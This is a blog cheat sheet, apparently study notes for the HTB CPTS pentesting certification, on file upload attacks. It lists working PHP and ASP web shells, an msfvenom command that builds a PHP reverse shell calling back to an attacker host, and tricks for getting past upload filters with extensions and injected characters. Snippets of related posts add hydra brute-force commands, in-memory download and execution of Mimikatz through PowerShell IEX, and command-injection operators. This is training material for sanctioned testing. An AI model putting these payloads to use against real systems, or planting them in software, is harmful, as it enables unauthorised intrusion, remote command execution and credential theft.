HTB CPTS Cheatsheet - File Upload Attacks
Web Shells
| Web Shell | Description |
|---|---|
<?php file_get_contents('/etc/passwd'); ?> |
Basic PHP File Read |
<?php system('hostname'); ?> |
Basic PHP Command Execution |
<?php system($_REQUEST['cmd']); ?> |
Basic PHP Web Shell |
<% eval request('cmd') %> |
Basic ASP Web Shell |
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php |
Generate PHP reverse shell |
| PHP Web Shell | PHP Web Shell |
| PHP Reverse Shell | PHP Reverse Shell |
| Web/Reverse Shells | List of Web Shells and Reverse Shells |
Bypasses
| Command | Description |
|---|---|
| Client-Side Bypass | |
[CTRL+SHIFT+C] |
Toggle Page Inspector |
| Blacklist Bypass | |
shell.phtml |
Uncommon Extension |
shell.pHp |
Case Manipulation |
| PHP Extensions | List of PHP Extensions |
| ASP Extensions | List of ASP Extensions |
| Web Extensions | List of Web Extensions |
| Whitelist Bypass | |
shell.jpg.php |
Double Extension |
shell.php.jpg |
Reverse Double Extension |
%20, %0a, %00, %0d0a, /, .\, ., … |
Character Injection - Before/After Extension |
| Content/Type Bypass | |
| Web Content-Types | List of Web Content-Types |
| Content-Types | List of All Content-Types |
| File Signatures | List of File Signatures/Magic Bytes |
Limited Uploads
| Potential Attack | File Types |
|---|---|
XSS |
HTML, JS, SVG, GIF |
XXE/SSRF |
XML, SVG, PDF, PPT, DOC |
DoS |
ZIP, JPG, PNG |
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Related Articles
2024-12-23
HTB CPTS Cheatsheet - Attacking Common Applications
Command Description sudo vim /etc/hosts Opens the /etc/hosts with vim to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a file generated by an nmap scan (web_discovery.xml) and cre...
2024-12-23
HTB CPTS Cheatsheet - Active Directory Enumeration And Attacks
Initial Enumeration Command Description nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host. sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified proceeding the -I o...
2024-12-23
HTB CPTS Cheatsheet - Attacking Common Services
Attacking FTP Command Description ftp 192.168.2.142 Connecting to the FTP server using the ftp client. nc -v 192.168.2.142 21 Connecting to the FTP server using netcat. hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service. Attacking SMB Command Description smbclient -N -L //10.129.14.128 Null-session testing against the SMB service. smbmap -H 10.129.14.128 Network share enumeration using smbmap. smbmap -H 10.129.14.128 -r no...
2024-12-23
HTB CPTS Cheatsheet - Brute Forcing
Hydra Command Description hydra -h hydra help hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist hydra -L bi...
2024-12-23
HTB CPTS Cheatsheet - File Transfers
Command Description Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1') Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verify...
2024-12-23
HTB CPTS Cheatsheet - Command Injection
Injection Operators Injection Operator Injection Character URL-Encoded Character Executed Command Semicolon ; %3b Both New Line \n %0a Both Background & %26 Both (second output generally shown first) Pipe | %7c Both (only second output is shown) AND && %26%26 Both (only if first succeeds) OR || %7c%7c Second (only if first fails) Sub-Shell `` %60%60 Both (Linux-only) Sub-Shell $() %24%28%29 Both (Linux-only) LinuxFiltered Character Bypass Code Description ...
